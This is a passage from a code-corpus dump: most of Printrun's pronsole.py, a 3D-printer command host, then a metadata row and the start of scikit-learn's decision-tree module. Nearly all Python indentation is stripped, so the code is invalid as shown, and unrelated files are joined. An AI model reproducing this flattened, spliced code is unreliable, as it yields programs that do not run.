if self.rpc_server is None:
self.rpc_server = ProntRPC(self)
else:
if self.rpc_server is not None:
self.rpc_server.shutdown()
self.rpc_server = None
# --------------------------------------------------------------
# Command line options handling
# --------------------------------------------------------------
def add_cmdline_arguments(self, parser):
parser.add_argument('-v', '--verbose', help = _("increase verbosity"), action = "store_true")
parser.add_argument('-c', '--conf', '--config', help = _("load this file on startup instead of .pronsolerc ; you may chain config files, if so settings auto-save will use the last specified file"), action = "append", default = [])
parser.add_argument('-e', '--execute', help = _("executes command after configuration/.pronsolerc is loaded ; macros/settings from these commands are not autosaved"), action = "append", default = [])
parser.add_argument('filename', nargs='?', help = _("file to load"))
def process_cmdline_arguments(self, args):
if args.verbose:
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
for config in args.conf:
self.load_rc(config)
if not self.rc_loaded:
self.load_default_rc()
self.processing_args = True
for command in args.execute:
self.onecmd(command)
self.processing_args = False
self.update_rpc_server(None, self.settings.rpc_server)
if args.filename:
filename = args.filename.decode(locale.getpreferredencoding())
self.cmdline_filename_callback(filename)
def cmdline_filename_callback(self, filename):
self.do_load(filename)
def parse_cmdline(self, args):
parser = argparse.ArgumentParser(description = 'Printrun 3D printer interface')
self.add_cmdline_arguments(parser)
args = [arg for arg in args if not arg.startswith("-psn")]
args = parser.parse_args(args = args)
self.process_cmdline_arguments(args)
setup_logging(sys.stdout, self.settings.log_path, True)
# --------------------------------------------------------------
# Printer connection handling
# --------------------------------------------------------------
def connect_to_printer(self, port, baud, dtr):
try:
self.p.connect(port, baud, dtr)
except SerialException as e:
# Currently, there is no errno, but it should be there in the future
if e.errno == 2:
self.logError(_("Error: You are trying to connect to a non-existing port."))
elif e.errno == 8:
self.logError(_("Error: You don't have permission to open %s.") % port)
self.logError(_("You might need to add yourself to the dialout group."))
else:
self.logError(traceback.format_exc())
# Kill the scope anyway
return False
except OSError as e:
if e.errno == 2:
self.logError(_("Error: You are trying to connect to a non-existing port."))
else:
self.logError(traceback.format_exc())
return False
self.statuscheck = True
self.status_thread = threading.Thread(target = self.statuschecker)
self.status_thread.start()
return True
def do_connect(self, l):
a = l.split()
p = self.scanserial()
port = self.settings.port
if (port == "" or port not in p) and len(p) > 0:
port = p[0]
baud = self.settings.baudrate or 115200
if len(a) > 0:
port = a[0]
if len(a) > 1:
try:
baud = int(a[1])
except:
self.log("Bad baud value '" + a[1] + "' ignored")
if len(p) == 0 and not port:
self.log("No serial ports detected - please specify a port")
return
if len(a) == 0:
self.log("No port specified - connecting to %s at %dbps" % (port, baud))
if port != self.settings.port:
self.settings.port = port
self.save_in_rc("set port", "set port %s" % port)
if baud != self.settings.baudrate:
self.settings.baudrate = baud
self.save_in_rc("set baudrate", "set baudrate %d" % baud)
self.connect_to_printer(port, baud, self.settings.dtr)
def help_connect(self):
self.log("Connect to printer")
self.log("connect <port> <baudrate>")
self.log("If port and baudrate are not specified, connects to first detected port at 115200bps")
ports = self.scanserial()
if ports:
self.log("Available ports: ", " ".join(ports))
else:
self.log("No serial ports were automatically found.")
def complete_connect(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in self.scanserial() if i.startswith(text)]
elif len(line.split()) == 3 or (len(line.split()) == 2 and line[-1] == " "):
return [i for i in ["2400", "9600", "19200", "38400", "57600", "115200"] if i.startswith(text)]
else:
return []
def scanserial(self):
"""scan for available ports. return a list of device names."""
baselist = []
if os.name == "nt":
try:
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, "HARDWARE\\DEVICEMAP\\SERIALCOMM")
i = 0
                while True:
baselist += [_winreg.EnumValue(key, i)[1]]
i += 1
except:
pass
for g in ['/dev/ttyUSB*', '/dev/ttyACM*', "/dev/tty.*", "/dev/cu.*", "/dev/rfcomm*"]:
baselist += glob.glob(g)
return filter(self._bluetoothSerialFilter, baselist)
def _bluetoothSerialFilter(self, serial):
return not ("Bluetooth" in serial or "FireFly" in serial)
def online(self):
self.log("\rPrinter is now online")
self.write_prompt()
def do_disconnect(self, l):
self.p.disconnect()
def help_disconnect(self):
self.log("Disconnects from the printer")
def do_block_until_online(self, l):
while not self.p.online:
time.sleep(0.1)
    def help_block_until_online(self, l = ""):
self.log("Blocks until printer is online")
self.log("Warning: if something goes wrong, this can block pronsole forever")
# --------------------------------------------------------------
# Printer status monitoring
# --------------------------------------------------------------
def statuschecker_inner(self, do_monitoring = True):
if self.p.online:
if self.p.writefailures >= 4:
self.logError(_("Disconnecting after 4 failed writes."))
self.status_thread = None
self.disconnect()
return
if do_monitoring:
if self.sdprinting and not self.paused:
self.p.send_now("M27")
if self.m105_waitcycles % 10 == 0:
self.p.send_now("M105")
self.m105_waitcycles += 1
cur_time = time.time()
wait_time = 0
while time.time() < cur_time + self.monitor_interval - 0.25:
if not self.statuscheck:
break
time.sleep(0.25)
# Safeguard: if system time changes and goes back in the past,
# we could get stuck almost forever
wait_time += 0.25
if wait_time > self.monitor_interval - 0.25:
break
# Always sleep at least a bit, if something goes wrong with the
# system time we'll avoid freezing the whole app this way
time.sleep(0.25)
def statuschecker(self):
while self.statuscheck:
self.statuschecker_inner()
# --------------------------------------------------------------
# File loading handling
# --------------------------------------------------------------
def do_load(self, filename):
self._do_load(filename)
def _do_load(self, filename):
if not filename:
self.logError("No file name given.")
return
self.log(_("Loading file: %s") % filename)
if not os.path.exists(filename):
self.logError("File not found!")
return
self.load_gcode(filename)
self.log(_("Loaded %s, %d lines.") % (filename, len(self.fgcode)))
self.log(_("Estimated duration: %d layers, %s") % self.fgcode.estimate_duration())
def load_gcode(self, filename, layer_callback = None, gcode = None):
if gcode is None:
self.fgcode = gcoder.LightGCode(deferred = True)
else:
self.fgcode = gcode
self.fgcode.prepare(open(filename, "rU"),
get_home_pos(self.build_dimensions_list),
layer_callback = layer_callback)
self.fgcode.estimate_duration()
self.filename = filename
def complete_load(self, text, line, begidx, endidx):
s = line.split()
if len(s) > 2:
return []
if (len(s) == 1 and line[-1] == " ") or (len(s) == 2 and line[-1] != " "):
if len(s) > 1:
return [i[len(s[1]) - len(text):] for i in glob.glob(s[1] + "*/") + glob.glob(s[1] + "*.g*")]
else:
return glob.glob("*/") + glob.glob("*.g*")
def help_load(self):
self.log("Loads a gcode file (with tab-completion)")
def do_slice(self, l):
l = l.split()
if len(l) == 0:
self.logError(_("No file name given."))
return
settings = 0
if l[0] == "set":
settings = 1
else:
self.log(_("Slicing file: %s") % l[0])
if not(os.path.exists(l[0])):
self.logError(_("File not found!"))
return
try:
if settings:
command = self.settings.sliceoptscommand
self.log(_("Entering slicer settings: %s") % command)
run_command(command, blocking = True)
else:
command = self.settings.slicecommand
stl_name = l[0]
gcode_name = stl_name.replace(".stl", "_export.gcode").replace(".STL", "_export.gcode")
run_command(command,
{"$s": stl_name,
"$o": gcode_name},
blocking = True)
self.log(_("Loading sliced file."))
                self.do_load(gcode_name)
        except Exception as e:
self.logError(_("Slicing failed: %s") % e)
def complete_slice(self, text, line, begidx, endidx):
s = line.split()
if len(s) > 2:
return []
if (len(s) == 1 and line[-1] == " ") or (len(s) == 2 and line[-1] != " "):
if len(s) > 1:
return [i[len(s[1]) - len(text):] for i in glob.glob(s[1] + "*/") + glob.glob(s[1] + "*.stl")]
else:
return glob.glob("*/") + glob.glob("*.stl")
def help_slice(self):
self.log(_("Creates a gcode file from an stl model using the slicer (with tab-completion)"))
self.log(_("slice filename.stl - create gcode file"))
self.log(_("slice filename.stl view - create gcode file and view using skeiniso (if using skeinforge)"))
self.log(_("slice set - adjust slicer settings"))
# --------------------------------------------------------------
# Print/upload handling
# --------------------------------------------------------------
def do_upload(self, l):
names = l.split()
if len(names) == 2:
filename = names[0]
targetname = names[1]
else:
self.logError(_("Please enter target name in 8.3 format."))
return
if not self.p.online:
self.logError(_("Not connected to printer."))
return
self._do_load(filename)
self.log(_("Uploading as %s") % targetname)
self.log(_("Uploading %s") % self.filename)
self.p.send_now("M28 " + targetname)
self.log(_("Press Ctrl-C to interrupt upload."))
self.p.startprint(self.fgcode)
try:
sys.stdout.write(_("Progress: ") + "00.0%")
sys.stdout.flush()
while self.p.printing:
time.sleep(0.5)
sys.stdout.write("\b\b\b\b\b%04.1f%%" % (100 * float(self.p.queueindex) / len(self.p.mainqueue),))
sys.stdout.flush()
self.p.send_now("M29 " + targetname)
time.sleep(0.2)
self.p.clear = True
self._do_ls(False)
self.log("\b\b\b\b\b100%.")
self.log(_("Upload completed. %s should now be on the card.") % targetname)
return
except (KeyboardInterrupt, Exception) as e:
if isinstance(e, KeyboardInterrupt):
self.logError(_("...interrupted!"))
else:
self.logError(_("Something wrong happened while uploading:")
+ "\n" + traceback.format_exc())
self.p.pause()
self.p.send_now("M29 " + targetname)
time.sleep(0.2)
self.p.cancelprint()
self.logError(_("A partial file named %s may have been written to the sd card.") % targetname)
def complete_upload(self, text, line, begidx, endidx):
s = line.split()
if len(s) > 2:
return []
if (len(s) == 1 and line[-1] == " ") or (len(s) == 2 and line[-1] != " "):
if len(s) > 1:
return [i[len(s[1]) - len(text):] for i in glob.glob(s[1] + "*/") + glob.glob(s[1] + "*.g*")]
else:
return glob.glob("*/") + glob.glob("*.g*")
def help_upload(self):
self.log("Uploads a gcode file to the sd card")
def help_print(self):
if not self.fgcode:
self.log(_("Send a loaded gcode file to the printer. Load a file with the load command first."))
else:
self.log(_("Send a loaded gcode file to the printer. You have %s loaded right now.") % self.filename)
def do_print(self, l):
if not self.fgcode:
self.logError(_("No file loaded. Please use load first."))
return
if not self.p.online:
self.logError(_("Not connected to printer."))
return
self.log(_("Printing %s") % self.filename)
self.log(_("You can monitor the print with the monitor command."))
self.sdprinting = False
self.p.startprint(self.fgcode)
def do_pause(self, l):
if self.sdprinting:
self.p.send_now("M25")
else:
if not self.p.printing:
self.logError(_("Not printing, cannot pause."))
return
self.p.pause()
self.paused = True
def help_pause(self):
self.log(_("Pauses a running print"))
def pause(self, event = None):
return self.do_pause(None)
def do_resume(self, l):
if not self.paused:
self.logError(_("Not paused, unable to resume. Start a print first."))
return
self.paused = False
if self.sdprinting:
self.p.send_now("M24")
return
else:
self.p.resume()
def help_resume(self):
self.log(_("Resumes a paused print."))
def listfiles(self, line):
if "Begin file list" in line:
self.sdlisting = 1
elif "End file list" in line:
self.sdlisting = 0
self.recvlisteners.remove(self.listfiles)
if self.sdlisting_echo:
self.log(_("Files on SD card:"))
self.log("\n".join(self.sdfiles))
elif self.sdlisting:
self.sdfiles.append(line.strip().lower())
def _do_ls(self, echo):
# FIXME: this was 2, but I think it should rather be 0 as in do_upload
self.sdlisting = 0
self.sdlisting_echo = echo
self.sdfiles = []
self.recvlisteners.append(self.listfiles)
self.p.send_now("M20")
def do_ls(self, l):
if not self.p.online:
self.logError(_("Printer is not online. Please connect to it first."))
return
self._do_ls(True)
def help_ls(self):
self.log(_("Lists files on the SD card"))
def waitforsdresponse(self, l):
if "file.open failed" in l:
self.logError(_("Opening file failed."))
self.recvlisteners.remove(self.waitforsdresponse)
return
if "File opened" in l:
self.log(l)
if "File selected" in l:
self.log(_("Starting print"))
self.p.send_now("M24")
self.sdprinting = True
# self.recvlisteners.remove(self.waitforsdresponse)
return
if "Done printing file" in l:
self.log(l)
self.sdprinting = False
self.recvlisteners.remove(self.waitforsdresponse)
return
if "SD printing byte" in l:
# M27 handler
try:
resp = l.split()
vals = resp[-1].split("/")
self.percentdone = 100.0 * int(vals[0]) / int(vals[1])
except:
pass
def do_reset(self, l):
self.p.reset()
def help_reset(self):
self.log(_("Resets the printer."))
def do_sdprint(self, l):
if not self.p.online:
self.log(_("Printer is not online. Please connect to it first."))
return
self._do_ls(False)
while self.listfiles in self.recvlisteners:
time.sleep(0.1)
if l.lower() not in self.sdfiles:
self.log(_("File is not present on card. Please upload it first."))
return
self.recvlisteners.append(self.waitforsdresponse)
self.p.send_now("M23 " + l.lower())
self.log(_("Printing file: %s from SD card.") % l.lower())
self.log(_("Requesting SD print..."))
time.sleep(1)
def help_sdprint(self):
self.log(_("Print a file from the SD card. Tab completes with available file names."))
self.log(_("sdprint filename.g"))
def complete_sdprint(self, text, line, begidx, endidx):
if not self.sdfiles and self.p.online:
self._do_ls(False)
while self.listfiles in self.recvlisteners:
time.sleep(0.1)
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in self.sdfiles if i.startswith(text)]
# --------------------------------------------------------------
# Printcore callbacks
# --------------------------------------------------------------
def startcb(self, resuming = False):
self.starttime = time.time()
if resuming:
self.log(_("Print resumed at: %s") % format_time(self.starttime))
else:
self.log(_("Print started at: %s") % format_time(self.starttime))
if not self.sdprinting:
self.compute_eta = RemainingTimeEstimator(self.fgcode)
else:
self.compute_eta = None
if self.settings.start_command:
output = get_command_output(self.settings.start_command,
{"$s": str(self.filename),
"$t": format_time(time.time())})
if output:
self.log("Start command output:")
self.log(output.rstrip())
try:
powerset_print_start(reason = "Preventing sleep during print")
except:
self.logError(_("Failed to set power settings:")
+ "\n" + traceback.format_exc())
def endcb(self):
try:
powerset_print_stop()
except:
self.logError(_("Failed to set power settings:")
+ "\n" + traceback.format_exc())
if self.p.queueindex == 0:
print_duration = int(time.time() - self.starttime + self.extra_print_time)
self.log(_("Print ended at: %(end_time)s and took %(duration)s") % {"end_time": format_time(time.time()),
"duration": format_duration(print_duration)})
# Update total filament length used
new_total = self.settings.total_filament_used + self.fgcode.filament_length
self.set("total_filament_used", new_total)
if not self.settings.final_command:
return
output = get_command_output(self.settings.final_command,
{"$s": str(self.filename),
"$t": format_duration(print_duration)})
if output:
self.log("Final command output:")
self.log(output.rstrip())
def recvcb_report(self, l):
isreport = REPORT_NONE
if "ok C:" in l or "Count" in l \
or ("X:" in l and len(gcoder.m114_exp.findall(l)) == 6):
self.posreport = l
isreport = REPORT_POS
if self.userm114 > 0:
self.userm114 -= 1
isreport |= REPORT_MANUAL
if "ok T:" in l or tempreading_exp.findall(l):
self.tempreadings = l
isreport = REPORT_TEMP
if self.userm105 > 0:
self.userm105 -= 1
isreport |= REPORT_MANUAL
else:
self.m105_waitcycles = 0
return isreport
def recvcb_actions(self, l):
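        # "!!" is the firmware's fatal error marker; "// action:<cmd>" is the
        # standard host action protocol (pause/resume/disconnect) handled below.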
if l.startswith("!!"):
self.do_pause(None)
msg = l.split(" ", 1)
if len(msg) > 1 and self.silent is False: self.logError(msg[1].ljust(15))
sys.stdout.write(self.promptf())
sys.stdout.flush()
return True
elif l.startswith("//"):
command = l.split(" ", 1)
if len(command) > 1:
command = command[1]
self.log(_("Received command %s") % command)
command = command.split(":")
if len(command) == 2 and command[0] == "action":
command = command[1]
if command == "pause":
self.do_pause(None)
sys.stdout.write(self.promptf())
sys.stdout.flush()
return True
elif command == "resume":
self.do_resume(None)
sys.stdout.write(self.promptf())
sys.stdout.flush()
return True
elif command == "disconnect":
self.do_disconnect(None)
sys.stdout.write(self.promptf())
sys.stdout.flush()
return True
return False
def recvcb(self, l):
l = l.rstrip()
for listener in self.recvlisteners:
listener(l)
if not self.recvcb_actions(l):
report_type = self.recvcb_report(l)
if report_type & REPORT_TEMP:
self.status.update_tempreading(l)
if l != "ok" and not self.sdlisting \
and not self.monitoring and (report_type == REPORT_NONE or report_type & REPORT_MANUAL):
if l[:5] == "echo:":
l = l[5:].lstrip()
if self.silent is False: self.log("\r" + l.ljust(15))
sys.stdout.write(self.promptf())
sys.stdout.flush()
def layer_change_cb(self, newlayer):
layerz = self.fgcode.all_layers[newlayer].z
if layerz is not None:
self.curlayer = layerz
if self.compute_eta:
secondselapsed = int(time.time() - self.starttime + self.extra_print_time)
self.compute_eta.update_layer(newlayer, secondselapsed)
def get_eta(self):
if self.sdprinting or self.uploading:
if self.uploading:
fractioncomplete = float(self.p.queueindex) / len(self.p.mainqueue)
else:
fractioncomplete = float(self.percentdone / 100.0)
secondselapsed = int(time.time() - self.starttime + self.extra_print_time)
# Prevent division by zero
secondsestimate = secondselapsed / max(fractioncomplete, 0.000001)
secondsremain = secondsestimate - secondselapsed
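            # e.g. 300s elapsed at 25% done -> 1200s total estimate, 900s left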
progress = fractioncomplete
elif self.compute_eta is not None:
secondselapsed = int(time.time() - self.starttime + self.extra_print_time)
secondsremain, secondsestimate = self.compute_eta(self.p.queueindex, secondselapsed)
progress = self.p.queueindex
else:
secondsremain, secondsestimate, progress = 1, 1, 0
return secondsremain, secondsestimate, progress
def do_eta(self, l):
if not self.p.printing:
self.logError(_("Printer is not currently printing. No ETA available."))
else:
secondsremain, secondsestimate, progress = self.get_eta()
eta = _("Est: %s of %s remaining") % (format_duration(secondsremain),
format_duration(secondsestimate))
self.log(eta.strip())
def help_eta(self):
self.log(_("Displays estimated remaining print time."))
# --------------------------------------------------------------
# Temperature handling
# --------------------------------------------------------------
def set_temp_preset(self, key, value):
if not key.startswith("bed"):
self.temps["pla"] = str(self.settings.temperature_pla)
self.temps["abs"] = str(self.settings.temperature_abs)
self.log("Hotend temperature presets updated, pla:%s, abs:%s" % (self.temps["pla"], self.temps["abs"]))
else:
self.bedtemps["pla"] = str(self.settings.bedtemp_pla)
self.bedtemps["abs"] = str(self.settings.bedtemp_abs)
self.log("Bed temperature presets updated, pla:%s, abs:%s" % (self.bedtemps["pla"], self.bedtemps["abs"]))
def tempcb(self, l):
if "T:" in l:
self.log(l.strip().replace("T", "Hotend").replace("B", "Bed").replace("ok ", ""))
def do_gettemp(self, l):
if "dynamic" in l:
self.dynamic_temp = True
if self.p.online:
self.p.send_now("M105")
time.sleep(0.75)
            self.log(_("Hotend: %s/%s") % (self.status.extruder_temp, self.status.extruder_temp_target))
            if self.status.bed_enabled:
                self.log(_("Bed: %s/%s") % (self.status.bed_temp, self.status.bed_temp_target))
def help_gettemp(self):
self.log(_("Read the extruder and bed temperature."))
def do_settemp(self, l):
l = l.lower().replace(", ", ".")
for i in self.temps.keys():
l = l.replace(i, self.temps[i])
try:
f = float(l)
except:
self.logError(_("You must enter a temperature."))
return
if f >= 0:
if f > 250:
self.log(_("%s is a high temperature to set your extruder to. Are you sure you want to do that?") % f)
if not self.confirm():
return
if self.p.online:
self.p.send_now("M104 S" + l)
self.log(_("Setting hotend temperature to %s degrees Celsius.") % f)
else:
self.logError(_("Printer is not online."))
else:
self.logError(_("You cannot set negative temperatures. To turn the hotend off entirely, set its temperature to 0."))
def help_settemp(self):
self.log(_("Sets the hotend temperature to the value entered."))
self.log(_("Enter either a temperature in celsius or one of the following keywords"))
self.log(", ".join([i + "(" + self.temps[i] + ")" for i in self.temps.keys()]))
def complete_settemp(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in self.temps.keys() if i.startswith(text)]
def do_bedtemp(self, l):
f = None
try:
l = l.lower().replace(", ", ".")
for i in self.bedtemps.keys():
l = l.replace(i, self.bedtemps[i])
f = float(l)
except:
self.logError(_("You must enter a temperature."))
if f is not None and f >= 0:
if self.p.online:
self.p.send_now("M140 S" + l)
self.log(_("Setting bed temperature to %s degrees Celsius.") % f)
else:
self.logError(_("Printer is not online."))
else:
self.logError(_("You cannot set negative temperatures. To turn the bed off entirely, set its temperature to 0."))
def help_bedtemp(self):
self.log(_("Sets the bed temperature to the value entered."))
self.log(_("Enter either a temperature in celsius or one of the following keywords"))
self.log(", ".join([i + "(" + self.bedtemps[i] + ")" for i in self.bedtemps.keys()]))
def complete_bedtemp(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in self.bedtemps.keys() if i.startswith(text)]
def do_monitor(self, l):
interval = 5
if not self.p.online:
self.logError(_("Printer is not online. Please connect to it first."))
return
if not (self.p.printing or self.sdprinting):
self.logError(_("Printer is not printing. Please print something before monitoring."))
return
self.log(_("Monitoring printer, use ^C to interrupt."))
if len(l):
try:
interval = float(l)
except:
self.logError(_("Invalid period given."))
self.log(_("Updating values every %f seconds.") % (interval,))
self.monitoring = 1
prev_msg_len = 0
try:
while True:
self.p.send_now("M105")
if self.sdprinting:
self.p.send_now("M27")
time.sleep(interval)
if self.p.printing:
preface = _("Print progress: ")
progress = 100 * float(self.p.queueindex) / len(self.p.mainqueue)
elif self.sdprinting:
preface = _("SD print progress: ")
progress = self.percentdone
prev_msg = preface + "%.1f%%" % progress
if self.silent is False:
sys.stdout.write("\r" + prev_msg.ljust(prev_msg_len))
sys.stdout.flush()
prev_msg_len = len(prev_msg)
except KeyboardInterrupt:
if self.silent is False: self.log(_("Done monitoring."))
self.monitoring = 0
def help_monitor(self):
self.log(_("Monitor a machine's temperatures and an SD print's status."))
self.log(_("monitor - Reports temperature and SD print status (if SD printing) every 5 seconds"))
self.log(_("monitor 2 - Reports temperature and SD print status (if SD printing) every 2 seconds"))
# --------------------------------------------------------------
# Manual printer controls
# --------------------------------------------------------------
def do_tool(self, l):
tool = None
try:
tool = int(l.lower().strip())
except:
self.logError(_("You must specify the tool index as an integer."))
if tool is not None and tool >= 0:
if self.p.online:
self.p.send_now("T%d" % tool)
self.log(_("Using tool %d.") % tool)
else:
self.logError(_("Printer is not online."))
else:
self.logError(_("You cannot set negative tool numbers."))
def help_tool(self):
self.log(_("Switches to the specified tool (e.g. doing tool 1 will emit a T1 G-Code)."))
def do_move(self, l):
if len(l.split()) < 2:
self.logError(_("No move specified."))
return
if self.p.printing:
self.logError(_("Printer is currently printing. Please pause the print before you issue manual commands."))
return
if not self.p.online:
self.logError(_("Printer is not online. Unable to move."))
return
l = l.split()
if l[0].lower() == "x":
feed = self.settings.xy_feedrate
axis = "X"
elif l[0].lower() == "y":
feed = self.settings.xy_feedrate
axis = "Y"
elif l[0].lower() == "z":
feed = self.settings.z_feedrate
axis = "Z"
elif l[0].lower() == "e":
feed = self.settings.e_feedrate
axis = "E"
else:
self.logError(_("Unknown axis."))
return
try:
float(l[1]) # check if distance can be a float
except:
self.logError(_("Invalid distance"))
return
try:
feed = int(l[2])
except:
pass
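        # Wrap the move in G91/G90 so it is executed as a relative move and
        # absolute positioning is restored for subsequent commands.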
self.p.send_now("G91")
self.p.send_now("G0 " + axis + str(l[1]) + " F" + str(feed))
self.p.send_now("G90")
def help_move(self):
self.log(_("Move an axis. Specify the name of the axis and the amount. "))
self.log(_("move X 10 will move the X axis forward by 10mm at %s mm/min (default XY speed)") % self.settings.xy_feedrate)
self.log(_("move Y 10 5000 will move the Y axis forward by 10mm at 5000mm/min"))
self.log(_("move Z -1 will move the Z axis down by 1mm at %s mm/min (default Z speed)") % self.settings.z_feedrate)
self.log(_("Common amounts are in the tabcomplete list."))
def complete_move(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in ["X ", "Y ", "Z ", "E "] if i.lower().startswith(text)]
elif len(line.split()) == 3 or (len(line.split()) == 2 and line[-1] == " "):
base = line.split()[-1]
rlen = 0
if base.startswith("-"):
rlen = 1
if line[-1] == " ":
base = ""
return [i[rlen:] for i in ["-100", "-10", "-1", "-0.1", "100", "10", "1", "0.1", "-50", "-5", "-0.5", "50", "5", "0.5", "-200", "-20", "-2", "-0.2", "200", "20", "2", "0.2"] if i.startswith(base)]
else:
return []
def do_extrude(self, l, override = None, overridefeed = 300):
length = self.settings.default_extrusion # default extrusion length
feed = self.settings.e_feedrate # default speed
if not self.p.online:
self.logError("Printer is not online. Unable to extrude.")
return
if self.p.printing:
self.logError(_("Printer is currently printing. Please pause the print before you issue manual commands."))
return
ls = l.split()
if len(ls):
try:
length = float(ls[0])
except:
self.logError(_("Invalid length given."))
if len(ls) > 1:
try:
feed = int(ls[1])
except:
self.logError(_("Invalid speed given."))
if override is not None:
length = override
feed = overridefeed
self.do_extrude_final(length, feed)
def do_extrude_final(self, length, feed):
if length > 0:
self.log(_("Extruding %fmm of filament.") % (length,))
elif length < 0:
self.log(_("Reversing %fmm of filament.") % (-length,))
else:
self.log(_("Length is 0, not doing anything."))
self.p.send_now("G91")
self.p.send_now("G1 E" + str(length) + " F" + str(feed))
self.p.send_now("G90")
def help_extrude(self):
self.log(_("Extrudes a length of filament, 5mm by default, or the number of mm given as a parameter"))
self.log(_("extrude - extrudes 5mm of filament at 300mm/min (5mm/s)"))
self.log(_("extrude 20 - extrudes 20mm of filament at 300mm/min (5mm/s)"))
self.log(_("extrude -5 - REVERSES 5mm of filament at 300mm/min (5mm/s)"))
self.log(_("extrude 10 210 - extrudes 10mm of filament at 210mm/min (3.5mm/s)"))
def do_reverse(self, l):
length = self.settings.default_extrusion # default extrusion length
feed = self.settings.e_feedrate # default speed
if not self.p.online:
self.logError(_("Printer is not online. Unable to reverse."))
return
if self.p.printing:
self.logError(_("Printer is currently printing. Please pause the print before you issue manual commands."))
return
ls = l.split()
if len(ls):
try:
length = float(ls[0])
except:
self.logError(_("Invalid length given."))
if len(ls) > 1:
try:
feed = int(ls[1])
except:
self.logError(_("Invalid speed given."))
self.do_extrude("", -length, feed)
def help_reverse(self):
self.log(_("Reverses the extruder, 5mm by default, or the number of mm given as a parameter"))
self.log(_("reverse - reverses 5mm of filament at 300mm/min (5mm/s)"))
self.log(_("reverse 20 - reverses 20mm of filament at 300mm/min (5mm/s)"))
self.log(_("reverse 10 210 - extrudes 10mm of filament at 210mm/min (3.5mm/s)"))
self.log(_("reverse -5 - EXTRUDES 5mm of filament at 300mm/min (5mm/s)"))
def do_home(self, l):
if not self.p.online:
self.logError(_("Printer is not online. Unable to move."))
return
if self.p.printing:
self.logError(_("Printer is currently printing. Please pause the print before you issue manual commands."))
return
if "x" in l.lower():
self.p.send_now("G28 X0")
if "y" in l.lower():
self.p.send_now("G28 Y0")
if "z" in l.lower():
self.p.send_now("G28 Z0")
if "e" in l.lower():
self.p.send_now("G92 E0")
if not len(l):
self.p.send_now("G28")
self.p.send_now("G92 E0")
def help_home(self):
self.log(_("Homes the printer"))
self.log(_("home - homes all axes and zeroes the extruder(Using G28 and G92)"))
self.log(_("home xy - homes x and y axes (Using G28)"))
self.log(_("home z - homes z axis only (Using G28)"))
self.log(_("home e - set extruder position to zero (Using G92)"))
self.log(_("home xyze - homes all axes and zeroes the extruder (Using G28 and G92)"))
def do_off(self, l):
self.off()
def off(self, ignore = None):
if self.p.online:
if self.p.printing: self.pause(None)
self.log(_("; Motors off"))
self.onecmd("M84")
self.log(_("; Extruder off"))
self.onecmd("M104 S0")
self.log(_("; Heatbed off"))
self.onecmd("M140 S0")
self.log(_("; Fan off"))
self.onecmd("M107")
self.log(_("; Power supply off"))
self.onecmd("M81")
else:
self.logError(_("Printer is not online. Unable to turn it off."))
def help_off(self):
self.log(_("Turns off everything on the printer"))
# --------------------------------------------------------------
# Host commands handling
# --------------------------------------------------------------
def process_host_command(self, command):
"""Override host command handling"""
command = command.lstrip()
if command.startswith(";@"):
command = command[2:]
self.log(_("G-Code calling host command \"%s\"") % command)
self.onecmd(command)
def do_run_script(self, l):
p = run_command(l, {"$s": str(self.filename)}, stdout = subprocess.PIPE)
for line in p.stdout.readlines():
self.log("<< " + line.strip())
def help_run_script(self):
self.log(_("Runs a custom script. Current gcode filename can be given using $s token."))
def do_run_gcode_script(self, l):
p = run_command(l, {"$s": str(self.filename)}, stdout = subprocess.PIPE)
for line in p.stdout.readlines():
self.onecmd(line.strip())
def help_run_gcode_script(self):
self.log(_("Runs a custom script which output gcode which will in turn be executed. Current gcode filename can be given using $s token."))
| modulexcite/Printrun | printrun/pronsole.py | Python | gpl-3.0 | 68,420 | ["Firefly"] | bbfcc6fa839696699476dad8d7a7affc5cbec2c1f96e0e9fe13fd4c4488b66a8 |
"""
This module gathers tree-based methods, including decision, regression and
randomized trees. Single and multi-output problems are both handled.
"""
# Authors: Gilles Louppe <g.louppe@gmail.com>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Brian Holt <bdholt1@gmail.com>
# Noel Dawe <noel@dawe.me>
# Satrajit Gosh <satrajit.ghosh@gmail.com>
# Joly Arnaud <arnaud.v.joly@gmail.com>
# Fares Hedayati <fares.hedayati@gmail.com>
#
# Licence: BSD 3 clause
from __future__ import division
import numbers
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import issparse
from ..base import BaseEstimator, ClassifierMixin, RegressorMixin
from ..externals import six
from ..feature_selection.from_model import _LearntSelectorMixin
from ..utils import check_array, check_random_state, compute_class_weight
from ..utils.validation import NotFittedError, check_is_fitted
from ._tree import Criterion
from ._tree import Splitter
from ._tree import DepthFirstTreeBuilder, BestFirstTreeBuilder
from ._tree import Tree
from . import _tree
__all__ = ["DecisionTreeClassifier",
"DecisionTreeRegressor",
"ExtraTreeClassifier",
"ExtraTreeRegressor"]
# =============================================================================
# Types and constants
# =============================================================================
DTYPE = _tree.DTYPE
DOUBLE = _tree.DOUBLE
CRITERIA_CLF = {"gini": _tree.Gini, "entropy": _tree.Entropy}
CRITERIA_REG = {"mse": _tree.MSE, "friedman_mse": _tree.FriedmanMSE}
DENSE_SPLITTERS = {"best": _tree.BestSplitter,
"presort-best": _tree.PresortBestSplitter,
"random": _tree.RandomSplitter}
SPARSE_SPLITTERS = {"best": _tree.BestSparseSplitter,
"random": _tree.RandomSparseSplitter}
# =============================================================================
# Base decision tree
# =============================================================================
class BaseDecisionTree(six.with_metaclass(ABCMeta, BaseEstimator,
_LearntSelectorMixin)):
"""Base class for decision trees.
Warning: This class should not be used directly.
Use derived classes instead.
"""
@abstractmethod
def __init__(self,
criterion,
splitter,
max_depth,
min_samples_split,
min_samples_leaf,
min_weight_fraction_leaf,
max_features,
max_leaf_nodes,
random_state,
class_weight=None):
self.criterion = criterion
self.splitter = splitter
self.max_depth = max_depth
self.min_samples_split = min_samples_split
